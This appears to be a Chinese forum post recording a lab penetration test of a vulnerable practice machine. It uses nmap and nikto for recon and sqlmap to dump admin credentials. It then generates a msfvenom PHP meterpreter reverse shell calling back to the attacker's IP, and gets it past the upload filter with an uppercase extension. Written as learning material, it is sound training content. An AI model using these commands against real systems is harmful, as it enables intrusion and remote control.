GetRoot-Get-SQL注入

webdogc   ·   发表于 2020-05-20 15:20:59   ·   技术文章投稿区

0x00前言
  本文是第一篇,重点记录对靶机80端口GET-SQL注入的渗透过程,涉及知识点:工具sqlmap、nikto及nmap的使用、文件上传、msf生成后门等。关于靶场,玩法不一,以下只是本人的一次学习过程,不喜勿喷。
0x01环境
  攻击机(kali):192.168.1.107
  靶机(Debian):192.168.1.103
0x02工具
  nmap、nikto、sqlmap、metasploit、VMware
0x03过程
  信息探测
  终端下输入nmap -T4 -A -p- 192.168.1.103

  探测结果为
    开放端口:22(ssh) & 80(http)
    Web容器信息:Apache httpd 2.2.16
    系统信息:Debian
  进一步使用nikto探测敏感信息
  终端下输入nikto -host http://192.168.1.103
  
  获取到php版本信息,以及/admin/login.php后台登录页面
  深入挖掘
  使用浏览器访问靶机ip
  
  打开登录页面ip/admin/login.php
  
  尝试弱口令,无果。这时可以使用Burpsuite结合字典进行暴力破解,这里不做演示。
  对网站进行浏览,发现id型展示页面,输入单引号,页面报错。
  
  进一步使用payloadand 1=1and 1=2,确认存在注入。
  拿出SQLmap,简单复习一下SQLmap命令

sqlmap -u url -current-db获取当前数据库名
sqlamp -u url -D "数据库名" --tables 获取指定数据库中的所有表名
sqlamp -u url -D "数据库名" -T “表名” --columns 获取指定表中的所有字段名
sqlamp -u url -D "数据库名" -T “表名” -C "字段名" --dump 获取指定表的数据

  通过上述命令,可以得到当前数据库photoblog表users中的字段值admin,P4ssw0rd
  漏洞利用
  
  成功登录之后在后台首页中,Add a new picture是文件上传点,利用msfvenom制作木马文件
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.107 LPORT=4444 -f raw >./Desktop/shell.php
  
  成功在桌面生成木马文件。

在文件上传中,一般都会存在一些对上传文件的严格限制,需要根据实际情况来想办法进行绕过,然而在大多数情况下,后台管理页面的限制比较简单。在这里将上传文件后缀名改为大写即(PHP),即可成功上传。

  为上传文件添加一个标题
  
  打开msfconsole控制台对文件进行监听
  
  开始监听,回到网页打开木马文件
  
  成功返回,输入shell,弹出命令行
  
  简单输入命令,发现当前用户为普通用户权限,接着需要进行提权操作,由于水平有,无法展开。

——————————————分割线——————————————
0x04总结
  此次渗透首先对目标站点进行信息收集,分析信息过程中发现SQL注入获取到后台登录密码,成功登录后台后发现文件上传点,接着制作木马文件并上传,然后使用msf控制台监听文件,当文件被执行时,成功返回网站shell。
  过程并不复杂,只是可以让自己对所学的知识进行简单的应用与梳理,脱离单一的靶场,初步了解渗透过程,并进一步熟悉自己掌握的知识点与技能。

作者:WebDogC

向靓仔靓女们求赞

用户名金币积分时间理由
admin 50.00 0 2020-05-22 09:09:57

打赏我,让我更有动力~

Attachment List

靶机.zip   File Size:0M (Download Count:2)

0 Reply   |  Until 2020-5-20 | 751 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.